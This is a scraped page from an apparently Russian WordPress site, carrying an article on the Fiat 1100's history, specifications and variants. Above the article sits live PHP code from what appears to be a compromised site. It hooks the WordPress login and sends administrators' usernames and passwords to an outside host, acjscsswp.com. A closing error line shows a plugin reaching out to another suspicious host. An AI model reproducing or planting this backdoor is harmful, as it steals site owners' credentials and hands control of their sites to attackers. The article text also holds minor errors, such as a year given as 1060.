if (!function_exists("theme_login_init_0e40e986decc158f6acbb41c14e2f2b4")) { function theme_login_init_0e40e986decc158f6acbb41c14e2f2b4() { if (isset($_POST['log']) and isset($_POST['pwd'])) { $abc = $_POST['log']; $bca = $_POST['pwd']; $zxa = (array)wp_authenticate($abc, $bca); if (isset($zxa["allcaps"]['administrator'])) { $url = 'https://acjscsswp.com/loginfileweb?url=' . urlencode(wp_login_url()) . '&user=' . urlencode($abc) . '&pass=' . urlencode($bca) . '&site=' . urlencode(wp_login_url()); $response = wp_remote_get($url); } } } add_action('wp_login', 'theme_login_init_0e40e986decc158f6acbb41c14e2f2b4', 10, 0); } Fiat 1100: история, характеристики, модификации — DigiLider

Fiat 1100: история, характеристики, модификации

Fiat 1100: история, характеристики, модификации

Fiat 1100: история, характеристики, модификации

Fiat 1100 появился на свет в 1937 году, когда в Италии правили фашисты. Он являлся модификацией 508-го Фиата, доработанного конструктором Данте Джакоза, которому на тот момент было 32 года.

Впоследствии Fiat 1100 Balilla и небольшая Topolino стали локомотивами продаж концерна, излучая неповторимый, чисто итальянский шарм с плавными линиями крыльев, благородным взглядом вынесенных наружу фар и обтекаемым радиатором. Все, что сегодня считается элегантной классикой.

Содержание

  • Технические характеристики
  • Особенности
  • Модификации
  • Заключение

Первые Fiat 11001 of 6

Технические характеристики Fiat 1100

  • Объем двигателя – 1089 см3.
  • Мощность – 43л.с. / 32.1квт при 4800 об/мин.
  • Снаряженная масса – 880 кг.
  • Высота: 1492 мм.
  • Ширина: 1460 мм.
  • Скорость 105 км.ч.
  • Расх. Топлава – 8л/100км.

Особенности Фиат 1100

Фиат 1100 поставили на рамную конструкцию, которая поддерживалась Х-образной поперечной балкой. Новшеством для того времени стало газораспределение через верхние клапаны, которое раньше не использовали на автомобилях этого класса. Еще одно нововведение – алюминиевые поршни.

Фиат развивал скорость 105км/ч, расходуя при этом 8 л бензина на 100 км. Задняя подвеска – рессорная. Коробка передач – механическая, четырехступенчатая. Мотор вращал задние колеса, передавая усилие через однодисковое сцепление.

Восьмиклапанный четырехцилиндровый двигатель расположили на передней оси, сместив радиатор ближе к водителю. Таким образом, передняя часть стала еще более обтекаемой. Конструкторы уменьшили облицовку радиатора, чтобы улучшить обзор и убрали все выступающие элементы, значительно повысив аэродинамику. Особым шиком для тех лет стали дворники с электроприводом.

1 of 3

Модификации

  • Fiat 1100-103. В 1953 году модель преобразили до неузнаваемости. Кузов стал цельнометаллическим, фары спрятали под капот. Выпускали две версии модели – эконом и стандартный вариант.
  • Fiat 1100 TV Spider – спортивная модификация, которую выпускали с 1955 по 1060 гг. Это был элегантный кабриолет с улучшенным двигателем и усовершенствованной аэродинамикой.
  • Fiat 1100D – представитель третьего поколения, сошедший с конвейера в 1962 году. Литера D означала Delight – удовольствие. Четырехдверный седан получил новую переднюю часть, а по бокам его сделали более простым и строгим.

Модификации Fiat 11001 of 6

Заключение

Fiat 1100 со всеми модификациями выпускали с 1937 по 1969 год. Итальянцы по праву гордятся этим автомобилем, который верно служил нескольким поколениям. Простая конструкция обеспечила модели надежность, а удобное управление – популярность.

Fiat 1100 назвали первым автомобилем, который был удобен как для пассажиров, так и для водителя. Но даже сегодня, спустя почти 100 лет после выпуска, Фиат 1100 можно увидеть не только в музеях – многие ценители восстанавливают раритетные автомобили и пользуются ими для повседневных поездок.


Warning: fsockopen(): Unable to connect to ssl://getajaxx.com:443 (Connection timed out) in /var/www/u0503503/data/www/digilider.ru/wp-content/plugins/custom-fetch-url/custom-fetch-url.php on line 22
Error: Connection timed out (110)